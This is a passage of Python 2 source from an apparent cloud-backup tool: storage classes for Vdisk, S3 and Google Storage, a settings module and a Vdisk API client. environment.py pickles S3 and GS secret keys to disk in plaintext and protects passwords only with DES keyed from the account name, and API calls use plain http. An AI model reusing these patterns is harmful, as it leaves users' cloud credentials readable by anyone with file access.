ACL_PERMISSION as S3_ACL_PERMISSION,
S3AclGrantByURI, S3AclGrantByPersonID)
from CloudBackup.lib.gs import (GSClient, GSAclGrantByAllUsers,
ACL_PERMISSION as GS_ACL_PERMISSION,
get_end_point as gs_get_end_point)
from CloudBackup.lib.errors import VdiskError, S3Error
from CloudBackup.utils import join_path
__author__ = "<NAME>"
class Storage(object):
def _ensure_cloud_path_legal(self, cloud_path):
return cloud_path.strip('/')
def set_holder(self, holder_name):
raise NotImplementedError
def _ensure_holder_exist(self, holder_name):
raise NotImplementedError
def upload(self, cloud_path, filename):
raise NotImplementedError
def download(self, cloud_path, filename):
raise NotImplementedError
def delete(self, cloud_path, filename):
raise NotImplementedError
def list(self, cloud_path, recursive=False):
raise NotImplementedError
def list_files(self, cloud_path, recursive=False):
raise NotImplementedError
def info(self, cloud_path):
raise NotImplementedError
def share(self, cloud_path):
raise NotImplementedError
class CloudFile(object):
def __init__(self, path, content_type, md5, **kwargs):
self.path = path
self.content_type = content_type
self.md5 = md5
for k, v in kwargs.iteritems():
setattr(self, k, v)
class CloudFolder(object):
def __init__(self, path, **kwargs):
self.path = path
for k, v in kwargs.iteritems():
setattr(self, k, v)
class VdiskStorage(Storage):
def __init__(self, client, cache={}, holder_name=''):
'''
:param client: must be VdiskClient or its subclass, CryptoVdiskClient eg.
:param cache(optional): the cache that stores path -> id key-value pairs, empty dict as default.
:param holder_name(optional): the folder that holds the content, blank as default.
'''
assert isinstance(client, VdiskClient)
self.cache = cache
self.client = client
self.holder = holder_name
if self.holder:
self._ensure_holder_exist(self.holder)
def set_holder(self, holder_name):
self.holder = holder_name
self._ensure_holder_exist(self.holder)
def _ensure_holder_exist(self, holder_name):
self._get_cloud_dir_id(self.holder, True)
def _ensure_cloud_path_legal(self, cloud_path):
path = join_path(self.holder, cloud_path)
return super(VdiskStorage, self)._ensure_cloud_path_legal(path)
def _get_cloud_dir_id(self, cloud_path, create_if_not_exist=False):
if len(cloud_path) == 0:
return 0
if isinstance(cloud_path, unicode):
cloud_path = cloud_path.encode('utf-8')
dir_id = self.cache.get(cloud_path, 0)
if dir_id != 0:
return dir_id
path = '/' + cloud_path if not cloud_path.startswith('/') else cloud_path
try:
dir_id = self.client.get_dirid_with_path(path)
self.cache[cloud_path] = str(dir_id)
return dir_id
except VdiskError, e:
if create_if_not_exist and e.err_no == 3: # means the dir not exist
parent_id = 0
if '/' in cloud_path:
parent_path, name = tuple(cloud_path.rsplit('/', 1))
parent_id = self._get_cloud_dir_id(parent_path,
create_if_not_exist=create_if_not_exist)
else:
name = cloud_path
data = self.client.create_dir(name, parent_id)
self.cache[cloud_path] = data.dir_id
return data.dir_id
else:
raise e
def _get_cloud_file_id(self, cloud_path, include_name=False):
if cloud_path in self.cache:
return self.cache[cloud_path]
if isinstance(cloud_path, unicode):
cloud_path = cloud_path.encode('utf-8')
dir_id = 0
if '/' in cloud_path:
dir_path, name = tuple(cloud_path.rsplit('/', 1))
dir_id = self._get_cloud_dir_id(dir_path)
else:
dir_path, name = '', cloud_path
has_next = True
c_page = 1
while has_next:
result = self.client.getlist(dir_id, page=c_page)
if c_page >= result.pageinfo.pageTotal:
has_next = False
else:
c_page += 1
for itm in result.list:
if itm.name == name.decode('utf-8'):
self.cache[cloud_path] = itm.id
if include_name:
return itm.id, itm.name
return itm.id
raise VdiskError(-1, 'File doesn\'t exist.')
def upload(self, cloud_path, filename, cover=True):
'''
Upload local file to the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
:param filename: the local file's absolute path.
:param cover(optional): set True to overwrite the file with the same name if it exists. True as default.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
dir_id = 0
if '/' in cloud_path:
dir_path, cloud_name = tuple(cloud_path.rsplit('/', 1))
dir_id = self._get_cloud_dir_id(dir_path, create_if_not_exist=True)
else:
cloud_name = cloud_path
self.client.upload_file(filename, dir_id, cover, upload_name=cloud_name)
def download(self, cloud_path, filename):
'''
Download the file to local from cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
:param filename: the local file's absolute path.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
fid = self._get_cloud_file_id(cloud_path)
self.client.download_file(fid, filename)
def delete(self, cloud_path):
'''
Delete the path in the cloud. If folder, delete all files and folders it contains.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
try:
dir_id = self._get_cloud_dir_id(cloud_path)
self.client.delete_dir(dir_id)
except VdiskError:
fid = self._get_cloud_file_id(cloud_path)
self.client.delete_file(fid)
def list(self, cloud_path, recursive=False):
'''
List all objects, including folders and files, in a cloud path.
:param cloud_path: the path on the cloud, 'test' eg, not need to start with '/'
list the root path if set to blank('').
:param recursive(Optional): if set to True, will return the objects recursively.
:return: it doesn't return all the objects immediately,
it returns an object each time, and then another, and goes on.
you should iterate over them with a for loop.
of course, you can use list() to put them all into memory,
however, it is not recommended.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
dir_path = '/' + cloud_path
dir_id = self._get_cloud_dir_id(dir_path)
has_next = True
c_page = 1
while has_next:
result = self.client.getlist(dir_id, page=c_page)
if c_page >= result.pageinfo.pageTotal:
has_next = False
else:
c_page += 1
for itm in result.list:
path = join_path(cloud_path, itm.name)
if self.holder:
path = path.split(self.holder+'/', 1)[1]
if 'url' in itm:
yield CloudFile(path, itm.type, itm.md5, id=itm.id)
else:
yield CloudFolder(path, id=itm.id)
if recursive and itm.file_num + itm.dir_num > 0:
for obj in self.list(path, recursive):
yield obj
def list_files(self, cloud_path, recursive=False):
'''
List all the files in a cloud path.
:param cloud_path: the path on the cloud, 'test' eg, not need to start with '/'
list the root path if set to blank('').
:param recursive(Optional): if set to True, will return the files recursively.
:return: it doesn't return all the files immediately,
it returns a file(a CloudFile instance) each time, and then another, and goes on.
you should iterate over them with a for loop.
of course, you can use list() to put them all into memory,
however, it is not recommended.
'''
for obj in self.list(cloud_path, recursive):
if isinstance(obj, CloudFile):
yield obj
def info(self, cloud_path):
'''
Get the information of a file on the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'.
:return: an instance of CloudFile.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
fid = self._get_cloud_file_id(cloud_path)
kwargs = dict(self.client.get_file_info(fid))
if self.holder:
kwargs['path'] = cloud_path.split(self.holder+'/', 1)[1]
else:
kwargs['path'] = cloud_path
kwargs['content_type'] = kwargs.pop('type')
return CloudFile(**kwargs)
def share(self, cloud_path):
'''
Share a file on the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'.
:return: the path to download.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
fid = self._get_cloud_file_id(cloud_path)
return self.client.share_file(fid).download_page
class S3Storage(Storage):
def __init__(self, client, holder_name):
'''
:param client: must be S3Client or its subclass, CryptoS3Client eg.
:param holder_name: the folder that holds the content.
In Amazon S3 you can only store files inside a bucket,
which is what the holder means here.
You have to give the holder a unique name to store files.
'''
assert isinstance(client, S3Client)
self.client = client
self.holder = holder_name
self._ensure_holder_exist(self.holder)
def _ensure_holder_exist(self, holder_name):
for bucket in self.client.list_buckets()[1]:
if bucket.name == holder_name:
return
self.client.put_bucket(holder_name)
def set_holder(self, holder_name):
self.holder = holder_name
self._ensure_holder_exist(self.holder)
def upload(self, cloud_path, filename):
'''
Upload local file to the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
:param filename: the local file's absolute path.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
self.client.upload_file(filename, self.holder, cloud_path)
def download(self, cloud_path, filename):
'''
Download the file to local from cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
:param filename: the local file's absolute path.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
if isinstance(cloud_path, unicode): cloud_path = cloud_path.encode('utf-8')
self.client.download_file(filename, self.holder, cloud_path)
def delete(self, cloud_path):
'''
Delete the path in the cloud. If folder, delete all files and folders it contains.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
self.client.delete_object(self.holder, cloud_path)
for obj in self.list_files(cloud_path, recursive=True):
self.client.delete_object(self.holder, obj.path)
def _get_cloud_file(self, s3_obj):
content_type = getattr(s3_obj, 'content_type', '')
md5 = s3_obj.etag.strip('"')
return CloudFile(s3_obj.key, content_type, md5)
def list(self, cloud_path, recursive=False):
'''
List all objects including folders and files in a cloud path.
:param cloud_path: the path on the cloud, 'test' eg, not need to start with '/'
list the root path if set to blank('').
:param recursive(Optional): if set to True, will return the objects recursively.
:return: it doesn't return all the objects immediately,
it returns an object each time, and then another, and goes on.
you should iterate over them with a for loop.
of course, you can use list() to put them all into memory,
however, it is not recommended.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
if isinstance(cloud_path, unicode): cloud_path = cloud_path.encode('utf-8')
prefix = '' if not cloud_path else cloud_path+'/'
objs, common_prefix, has_next = self.client.get_bucket(self.holder,
prefix=prefix,
delimiter='/')
for obj in objs:
yield self._get_cloud_file(obj)
while has_next:
marker = objs[-1].key
objs, common_prefix, has_next = self.client.get_bucket(self.holder,
prefix=prefix,
delimiter='/',
marker=marker)
for obj in objs:
yield self._get_cloud_file(obj)
for prefix in common_prefix:
yield CloudFolder(self._ensure_cloud_path_legal(prefix))
if recursive:
for prefix in common_prefix:
for obj in self.list(prefix, recursive):
yield obj
def list_files(self, cloud_path, recursive=False):
'''
List all the files in a cloud path.
:param cloud_path: the path on the cloud, 'test' eg, not need to start with '/'
list the root path if set to blank('').
:param recursive(Optional): if set to True, will return the files recursively.
:return: it doesn't return all the files immediately,
it returns a file(a CloudFile instance) each time, and then another, and goes on.
you should iterate over them with a for loop.
of course, you can use list() to put them all into memory,
however, it is not recommended.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
prefix = '' if not cloud_path else cloud_path+'/'
kwargs = {'prefix': prefix}
if not recursive:
kwargs['delimiter'] = '/'
objs, _, has_next = self.client.get_bucket(self.holder, **kwargs)
for obj in objs:
yield self._get_cloud_file(obj)
while has_next:
marker = objs[-1].key
kwargs['marker'] = marker
objs, _, has_next = self.client.get_bucket(self.holder, **kwargs)
for obj in objs:
yield self._get_cloud_file(obj)
def info(self, cloud_path):
'''
Get the information of a file on the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'.
:return: an instance of CloudFile.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
s3_obj = self.client.get_object(self.holder, cloud_path)
kwargs = {}
for attr in dir(s3_obj):
if not attr.startswith('_') \
and attr != 'mapping' \
and attr != 'from_xml':
kwargs[attr] = getattr(s3_obj, attr)
kwargs['md5'] = kwargs.pop('etag').strip('"')
kwargs['path'] = cloud_path
return CloudFile(**kwargs)
def share(self, cloud_path):
'''
Share a file on the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'.
:return: the path to download.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
if hasattr(self.client, 'owner'):
owner = self.client.owner
else:
owner = self.client.get_object_acl(self.holder, cloud_path)[0]
self.client.set_owner(owner)
all_user_grant = S3AclGrantByURI(ALL_USERS_URI, S3_ACL_PERMISSION.read)
owner_grant = S3AclGrantByPersonID(owner, S3_ACL_PERMISSION.full_control)
self.client.put_object_acl(self.holder, cloud_path, owner, all_user_grant, owner_grant)
return s3_get_end_point(self.holder, cloud_path, True)
class GSStorage(S3Storage):
def __init__(self, client, holder_name):
'''
:param client: must be GSClient or its subclass, CryptoGSClient eg.
:param holder_name: the folder that holds the content.
In Google Cloud Storage, as in Amazon S3, you can only store files
inside a bucket, which is what the holder means here.
You have to give the holder a unique name to store files.
'''
assert isinstance(client, GSClient)
self.client = client
self.holder = holder_name
self._ensure_holder_exist(self.holder)
def _ensure_holder_exist(self, holder_name):
for bucket in self.client.get_service()[1]:
if bucket.name == holder_name:
return
self.client.put_bucket(holder_name)
def share(self, cloud_path):
'''
Share a file on the cloud.
:param cloud_path: the path on the cloud, 'test/file.txt' eg, not need to start with '/'.
:return: the path to download.
'''
cloud_path = self._ensure_cloud_path_legal(cloud_path)
if hasattr(self.client, 'owner'):
owner = self.client.owner
else:
owner = self.client.get_object(self.holder, cloud_path, acl=True)[0]
self.client.set_owner(owner)
grant = GSAclGrantByAllUsers(GS_ACL_PERMISSION.read)
self.client.put_object(self.holder, cloud_path, owner=owner, grants=(grant, ))
return gs_get_end_point(self.holder, cloud_path, True)
```
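A minimal usage sketch for the storage layer above; the credentials, holder name and paths are placeholders, and the auth flow mirrors the one used by environment.py below:
```python
from CloudBackup.lib.vdisk import VdiskClient
from CloudBackup.cloud import VdiskStorage

client = VdiskClient('APP_KEY', 'APP_SECRET')        # placeholder credentials
client.auth('account', 'password')                   # 'local' account type by default
storage = VdiskStorage(client, holder_name='backup')

storage.upload('docs/readme.txt', '/home/me/readme.txt')   # local -> cloud
for f in storage.list_files('', recursive=True):            # walk every cloud file
    print f.path, f.md5
print storage.share('docs/readme.txt')                      # public download page
```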
#### File: CloudBackup/CloudBackup/environment.py
```python
import threading
import os
try:
import cPickle as pickle
except ImportError:
import pickle
# from CloudBackup.lib.vdisk import VdiskClient, CryptoVdiskClient
from CloudBackup.client import VdiskClient, CryptoVdiskClient
from CloudBackup.lib.s3 import S3Client, CryptoS3Client
from CloudBackup.lib.gs import GSClient, CryptoGSClient
from CloudBackup.lib.errors import VdiskError, S3Error, GSError
from CloudBackup.lib.crypto import DES
from CloudBackup.cloud import VdiskStorage, S3Storage, GSStorage
from CloudBackup.local import SyncHandler, S3SyncHandler, VdiskRefreshToken
from CloudBackup.errors import CloudBackupError
from CloudBackup.utils import win_hide_file, get_info_path, ensure_folder_exsits
from CloudBackup.test.settings import VDISK_APP_KEY, VDISK_APP_SECRET
DEFAULT_SLEEP_MINUTS = 1
DEFAULT_SLEEP_SECS = DEFAULT_SLEEP_MINUTS * 60
OFFSET = 3
get_settings_path = lambda dirpath, setting_type: \
os.path.join(dirpath, '.%s.setting' % setting_type)
encrypt = lambda s: ','.join((str(ord(l) + OFFSET) for l in s))
decrypt = lambda s: ''.join((chr(int(l) - OFFSET) for l in s.split(',')))
def serilize(file_obj, content, encrypt_func, *encrypt_fields):
assert isinstance(content, dict)
for field in encrypt_fields:
if field in content:
content[field] = encrypt_func(content.pop(field))
pickle.dump(content, file_obj)
def unserilize(file_obj, decrypt_func, *decrypt_fields):
file_obj.seek(0)
content = pickle.load(file_obj)
for field in decrypt_fields:
if field in content:
content[field] = decrypt_func(content.pop(field))
return content
def save_info(info_type, content, encrypt_func, *encrypt_fields):
folder_name = get_info_path()
ensure_folder_exsits(folder_name)
settings_path = get_settings_path(folder_name, info_type)
file_obj = open(settings_path, 'w+')
try:
serilize(file_obj, content, encrypt_func, *encrypt_fields)
finally:
file_obj.close()
def get_info(info_type, decrypt_func, *decrypt_fields):
folder_name = get_info_path()
settings_path = get_settings_path(folder_name, info_type)
if not os.path.exists(settings_path):
return
file_obj = open(settings_path, 'r')
try:
return unserilize(file_obj, decrypt_func, *decrypt_fields)
finally:
file_obj.close()
class Environment(object):
instance = None
vdisk_handler = None
vdisk_lock = threading.Lock()
vdisk_token_refresh = None
s3_handler = None
s3_lock = threading.Lock()
gs_handler = None
gs_lock = threading.Lock()
def __new__(cls, *args, **kwargs):
if not cls.instance:
cls.instance = super(Environment, cls).__new__(
cls, *args, **kwargs)
return cls.instance
def _get_iv(self, astr):
if len(astr) >= 8:
iv = astr[:8]
else:
iv = astr + '*' * (8 - len(astr))
return iv
def _get_encrypt(self, iv):
des = DES(iv)
return des.encrypt
def _get_decrypt(self, iv):
des = DES(iv)
return des.decrypt
def setup_vdisk(self, account, password, local_folder, holder, is_weibo=False,
log=True, encrypt=False, encrypt_code=None, force_stop=True):
try:
self.vdisk_lock.acquire()
if not force_stop and self.vdisk_handler:
return self.vdisk_handler
if force_stop and self.vdisk_handler:
self.vdisk_handler.stop()
if encrypt and encrypt_code:
client = CryptoVdiskClient(VDISK_APP_KEY, VDISK_APP_SECRET)
client.auth(account, password, encrypt_code, 'sinat' if is_weibo else 'local')
else:
client = VdiskClient(VDISK_APP_KEY, VDISK_APP_SECRET)
client.auth(account, password, 'sinat' if is_weibo else 'local')
self.vdisk_token_refresh = VdiskRefreshToken(client)
self.vdisk_token_refresh.setDaemon(True)
self.vdisk_token_refresh.start()
storage = VdiskStorage(client, holder_name=holder)
try:
handler = SyncHandler(storage, local_folder, sec=DEFAULT_SLEEP_SECS, log=log)
handler.setDaemon(True)
handler.start()
self.vdisk_handler = handler
self.save_vdisk_info(account, password, local_folder, holder,
is_weibo, log, encrypt, encrypt_code)
return handler
except VdiskError, e:
raise CloudBackupError(e.src, e.err_no, e.msg)
finally:
self.vdisk_lock.release()
def stop_vdisk(self, clear_info=True):
try:
self.vdisk_lock.acquire()
if self.vdisk_handler is None:
return
self.vdisk_handler.stop()
self.vdisk_handler = None
self.vdisk_token_refresh.stop()
self.vdisk_token_refresh = None
if clear_info:
self.remove_vdisk_info()
finally:
self.vdisk_lock.release()
def save_vdisk_info(self, account, password, local_folder, holder,
is_weibo=False, log=True, encrypt=False, encrypt_code=None):
if self.vdisk_handler is None:
return
args = locals()
del args['self']
save_info('vdisk', args, self._get_encrypt(self._get_iv(account)), 'password')
def load_vdisk_info(self):
info = get_info('vdisk', lambda s: s)
if info is None:
return
info['password'] = self._get_decrypt(self._get_iv(info['account']))(info.pop('password'))
return info
def remove_vdisk_info(self):
save_file = get_settings_path(get_info_path(), 'vdisk')
if os.path.exists(save_file):
os.remove(save_file)
def setup_s3(self, access_key, secret_access_key, local_folder, holder,
log=True, encrypt=False, encrypt_code=None, force_stop=True):
try:
self.s3_lock.acquire()
if not force_stop and self.s3_handler:
return self.s3_handler
if force_stop and self.s3_handler:
self.s3_handler.stop()
if encrypt and encrypt_code:
client = CryptoS3Client(access_key, secret_access_key, encrypt_code)
else:
client = S3Client(access_key, secret_access_key)
storage = S3Storage(client, holder)
try:
handler = S3SyncHandler(storage, local_folder, sec=DEFAULT_SLEEP_SECS, log=log)
handler.setDaemon(True)
handler.start()
self.s3_handler = handler
self.save_s3_info(access_key, secret_access_key, local_folder, holder,
log, encrypt, encrypt_code)
return handler
except S3Error, e:
raise CloudBackupError(e.src, e.err_no, e.msg)
finally:
self.s3_lock.release()
def stop_s3(self, clear_info=True):
try:
self.s3_lock.acquire()
if self.s3_handler is None:
return
self.s3_handler.stop()
self.s3_handler = None
if clear_info:
self.remove_s3_info()
finally:
self.s3_lock.release()
def save_s3_info(self, access_key, secret_access_key, local_folder, holder,
log=True, encrypt=False, encrypt_code=None):
if self.s3_handler is None:
return
args = locals()
del args['self']
save_info('s3', args, lambda s: s)
def load_s3_info(self):
info = get_info('s3', lambda s: s)
return info
def remove_s3_info(self):
save_file = get_settings_path(get_info_path(), 's3')
if os.path.exists(save_file):
os.remove(save_file)
def setup_gs(self, access_key, secret_access_key, project_id, local_folder, holder,
log=True, encrypt=False, encrypt_code=None, force_stop=True):
try:
self.gs_lock.acquire()
if not force_stop and self.gs_handler:
return self.gs_handler
if force_stop and self.gs_handler:
self.gs_handler.stop()
if encrypt and encrypt_code:
client = CryptoGSClient(access_key, secret_access_key, project_id, encrypt_code)
else:
client = GSClient(access_key, secret_access_key, project_id)
storage = GSStorage(client, holder)
try:
handler = SyncHandler(storage, local_folder, sec=DEFAULT_SLEEP_SECS, log=log)
handler.setDaemon(True)
handler.start()
self.gs_handler = handler
self.save_gs_info(access_key, secret_access_key, project_id,
local_folder, holder, log, encrypt, encrypt_code)
return handler
except GSError, e:
raise CloudBackupError(e.src, e.err_no, e.msg)
finally:
self.gs_lock.release()
def stop_gs(self, clear_info=True):
try:
self.gs_lock.acquire()
if self.gs_handler is None:
return
self.gs_handler.stop()
self.gs_handler = None
if clear_info:
self.remove_gs_info()
finally:
self.gs_lock.release()
def save_gs_info(self, access_key, secret_access_key, project_id,
local_folder, holder,
log=True, encrypt=False, encrypt_code=None):
if self.gs_handler is None:
return
args = locals()
del args['self']
save_info('gs', args, lambda s: s)
def load_gs_info(self):
info = get_info('gs', lambda s: s)
return info
def remove_gs_info(self):
save_file = get_settings_path(get_info_path(), 'gs')
if os.path.exists(save_file):
os.remove(save_file)
```
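The module-level `encrypt`/`decrypt` helpers above are a simple ordinal shift with OFFSET = 3; a quick worked example:
```python
OFFSET = 3
encrypt = lambda s: ','.join((str(ord(l) + OFFSET) for l in s))
decrypt = lambda s: ''.join((chr(int(l) - OFFSET) for l in s.split(',')))

print encrypt('abc')            # -> '100,101,102'  (97+3, 98+3, 99+3)
print decrypt('100,101,102')    # -> 'abc'
```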
#### File: CloudBackup/lib/vdisk.py
```python
import urllib, urllib2
import time
import os
try:
import json # json is simplejson in 2.6+
except ImportError:
import simplejson as json
from errors import VdiskError
from utils import hmac_sha256_hex as hmac_sha256, encode_multipart
from crypto import DES
__author__ = "<NAME>"
__description__ = "A client for vdisk api, site: http://vdisk.me/api/doc"
__all__ = ['VdiskClient', 'CryptoVdiskClient']
endpoint = "http://openapi.vdisk.me/"
def _call(url_params, params, headers=None, method="POST", try_times=3, try_interval=3):
def _get_data():
if method == "GET":
if isinstance(params, str):
full_params = "&".join((url_params, params))
else:
full_params = "&".join((url_params, urllib.urlencode(params)))
path = "%s?%s" % (endpoint, full_params)
resp = urllib2.urlopen(path)
return json.loads(resp.read())
# if method is POST
path = "%s?%s" % (endpoint, url_params)
if isinstance(params, (str, unicode)):
encoded_params = params
else:
encoded_params = urllib.urlencode(params)
if headers is not None:
req = urllib2.Request(path, encoded_params, headers)
resp = urllib2.urlopen(req)
else:
resp = urllib2.urlopen(path, encoded_params)
return json.loads(resp.read())
for i in range(try_times):
try:
return _get_data()
except urllib2.URLError:
time.sleep(try_interval)
raise VdiskError(-1, "Can't connect to server")
def get_signature(data, app_secret):
data_str = '&'.join(['%s=%s' % (k, data[k]) for k in sorted(data)])
return hmac_sha256(app_secret, data_str)
class VdiskObject(dict):
def __getattr__(self, attr):
if attr in self:
obj = self[attr]
if isinstance(obj, list):
return [VdiskObject(itm) for itm in obj]
elif isinstance(obj, dict):
return VdiskObject(obj)
return obj
class VdiskClient(object):
'''
Vdisk client.
You can use it by the steps below:
client = VdiskClient('your_app_key', 'your_app_secret') # init
client.auth('your_account', 'your_password') # auth
client.upload_file('/from_path/file_name', 0, True) # call the vdisk api
'''
def __init__(self, app_key, app_secret):
'''
:param app_key: the app key of your vdisk api, the url is http://vdisk.me/api/addapp
:param app_secret: the app secret
'''
self.app_key = app_key
self.app_secret = app_secret
self.dologid = 0
def auth(self, account, password, app_type="local"):
'''
After init the VdiskClient object, you should auth with a user's account.
:param account: the user's account
:param password: the user's password
:param app_type: 'local' stands for the vdisk user as default,
and 'sinat' stands for the sina weibo user.
'''
self.account, self.password = account, password
self.token = self.get_token(account, password, app_type)
self._base_oper('a=keep', {'token': self.token}) # init dologid
def _base_oper(self, url_params, params, **kwargs):
result = _call(url_params, params, **kwargs)
if result['err_code'] != 0:
raise VdiskError(result['err_code'], result['err_msg'])
self.dologid = result['dologid']
ret_result = result.get('data', {})
ret_result['dologdir'] = result['dologdir']
return VdiskObject(ret_result)
def get_token(self, account, password, app_type="local"):
'''
Get token.
'''
params = {
'account': account,
'password': password,
'appkey': self.app_key,
'time': time.time()
}
params['signature'] = get_signature(params, self.app_secret)
if app_type != 'local':
params['app_type'] = app_type
result = _call('m=auth&a=get_token', params)
if result['err_code'] != 0:
raise VdiskError(result['err_code'], result['err_msg'])
return result['data']['token']
def keep(self):
'''
Keep alive.
'''
self._base_oper('a=keep', {'token': self.token,
'dologid': self.dologid})
def keep_token(self):
'''
Keep the token.
You have to do this operation every 10 to 15 minutes,
or the token will expire.
:return: the return data.
The example of return 0:
{
"uid":1000001
}
'''
return self._base_oper('m=user&a=keep_token', {'token': self.token,
'dologid': self.dologid})
def upload_file(self, filename, dir_id, cover, upload_name=None,
maxsize=10, callback=None, dir_=None,
encrypt=False, encrypt_func=None):
'''
Upload file.
:param filename: the absolute path of a file
:param dir_id: the id of the folder where the file upload to
:param cover: bool viriable, True if you want to cover the file which exists
:param upload_name(optional): the name of file when uploaded to vdisk, blank as local name
:param maxsize(optional): the max size, 10M as default
:param callback(optional): the redirect url, msg will be transfered if set
:param dir_(optional): the dir where the file exists; the param dir_id will be ignored if this is set.
:return:
The example
{
"fid":"168593",
"name":"MIME.txt",
"uid":"62",
"dir_id":0,
"do_dir":"0,82914,82915,82916,82917",
"ctime":1288781102,
"ltime":1288781102,
"size":40049,
"type":"text/plain",
"md5":"07c2e4630203b0425546091d044d608b",
"url":"http://openapi.vdisk.me/open_file/……"
}
'''
try:
if os.path.getsize(filename) > maxsize * (1024 ** 2):
raise VdiskError(-2, 'The file is larger than %dM' % maxsize)
except os.error:
raise VdiskError(-1, 'Can\'t access the file')
fp = open(filename, 'rb')
try:
params = {
'token': self.token,
'dir_id': dir_id,
'cover': 'yes' if cover else 'no',
'file': fp,
'dologid': self.dologid
}
if upload_name:
params['file'] = (fp, upload_name)
if callback:
params['callback'] = callback
if dir_:
params['dir'] = dir_
if encrypt and encrypt_func is not None:
params, boundary = encode_multipart(params, True, encrypt_func)
else:
params, boundary = encode_multipart(params)
headers = {
'Content-Type': 'multipart/form-data; boundary=%s' % boundary
}
return self._base_oper('m=file&a=upload_file', params, headers=headers)
finally:
fp.close()
def download_file(self, fid, filename, decrypt=False, decrypt_func=None):
'''
Download file by file id.
:param fid: file id
:param filename: the local path where file downloads to save
'''
data = self.get_file_info(fid)
url = data['s3_url']
fp = open(filename, 'wb')
try:
resp = urllib2.urlopen(url)
if decrypt and decrypt_func is not None:
fp.write(decrypt_func(resp.read()))
else:
fp.write(resp.read())
finally:
fp.close()
def create_dir(self, create_name, parent_id):
'''
:param create_name: dir name
:param parent_id: the parent dir id, 0 as the root dir
:return: the return data.
The example:
{
"dir_id":"35503",
"name":"\u6d4b\u8bd5",
"pid":0,
"uid":"62",
"ctime":1289271836,
"ltime":1289271836
}
'''
return self._base_oper('m=dir&a=create_dir', {
'token': self.token,
'create_name': create_name,
'parent_id': parent_id,
'dologid': self.dologid
})
def delete_dir(self, dir_id):
'''
:param dir_id: the dir id
'''
return self._base_oper('m=dir&a=delete_dir', {
'token': self.token,
'dir_id': dir_id,
'dologid': self.dologid
})
def rename_dir(self, dir_id, new_name):
'''
:param dir_id: dir id
:param new_name: new name of the dir
'''
return self._base_oper('m=dir&a=rename_dir', {
'token': self.token,
'dir_id': dir_id,
'new_name': new_name,
'dologid': self.dologid
})
def move_dir(self, dir_id, new_name, to_parent_id):
'''
:param dir_id: dir id
:param new_name: new name of the dir
:param to_parent_id: the parent dir id.
:return: the return data.
The example:
{
"name":"\u79fb\u52a8\u540e\u7684\u76ee\u5f55",
"dir_id":3929,
"parent_id":0
}
'''
return self._base_oper('m=dir&a=move_dir', {
'token': self.token,
'dir_id': dir_id,
'new_name': new_name,
'to_parent_id': to_parent_id,
'dologid': self.dologid
})
def getlist(self, dir_id, page=1, pageSize=1024):
'''
Get the list of an dir.
:param dir_id: dir id
:param page(optional): the page, 1 as default
:param pageSize(optional): the pageSize, 1024 as default and also if pageSize>=2 or pageSize<1024
:return: the return data.
The example:
{
"list":[
{
"id":"1190019",
"name":"test.php",
"dir_id":"0",
"ctime":"1294734798",
"ltime":"1294734798",
"size":"216 Bytes",
"type":"text\/php",
"md5":"0a706f2d0958838673dea185dd4290ed",
"sha1":"925b8e9a606ca5b3908ab3b53117e85ebcd35cd0",
"share":-1,
"byte":"216",
"length":"216",
"thumbnail":"http:\/\/……",//图片文件
"url":"http:\/\/……
},
……
],
"pageinfo":{
"page":1,
"pageSize":10,
"rstotal":19,
"pageTotal":2
}
}
'''
params = {'token': self.token,
'dir_id': dir_id,
'dologid': self.dologid}
if page > 1:
params['page'] = page
if 2 <= pageSize < 1024:
params['pageSize'] = pageSize
return self._base_oper('m=dir&a=getlist', params)
def get_quota(self):
'''
Get the status of your vdisk usage.
:return: the return data.
The example:
{
"used":"1330290823",
"total":"4294967296"
}
'''
return self._base_oper('m=file&a=get_quota', {'token': self.token,
'dologid': self.dologid})
def get_file_info(self, fid):
'''
:param fid: file id
:return: the return data.
The example:
{
"id":"219379", // 文件id
"name":"VS2008TeamSuite90DayTrialCHSX1429243.part4.rar", 文件名
"dir_id":"4280", // 目录id
"ctime":"1289267775", // 创建时间
"ltime":"1289267775", // 最后修改时间
"size":"734003200", // 大小,单位(B)
"type":"application\/x-rar-compressed",
"md5":"5cdad57bc23f64e17fd64b45e3bf3308",
"url":"http:\/\/openapi.vdisk.me\/open_file\/……", // 分享地址
"s3_url":"http:\/\/data.vdisk.me\/1245/" // 下载地址
}
'''
return self._base_oper('m=file&a=get_file_info', {'token': self.token,
'fid': fid,
'dologid': self.dologid})
def delete_file(self, fid):
'''
:param fid: file id
'''
return self._base_oper('m=file&a=delete_file', {'token': self.token,
'fid': fid,
'dologid': self.dologid})
def copy_file(self, fid, new_name, to_dir_id):
'''
:param fid: file id
:param new_name: new name of the file
:param to_dir_id: the id of dir which file copied to
:return: the return data.
The example:
{
"uid":"62",
"ctime":1289287059,
"ltime":1289287059,
"size":"734003200",
"type":"application\/x-rar-compressed",
"md5":"5cdad57bc23f64e17fd64b45e3bf3308",
"name":"\u526f\u672c.rar",
"dir_id":3929,
"fid":"222352",
"url":"http:\/\/openapi.vdisk.me\/open_file\/……"
}
'''
return self._base_oper('m=file&a=copy_file', {'token': self.token,
'fid': fid,
'new_name': new_name,
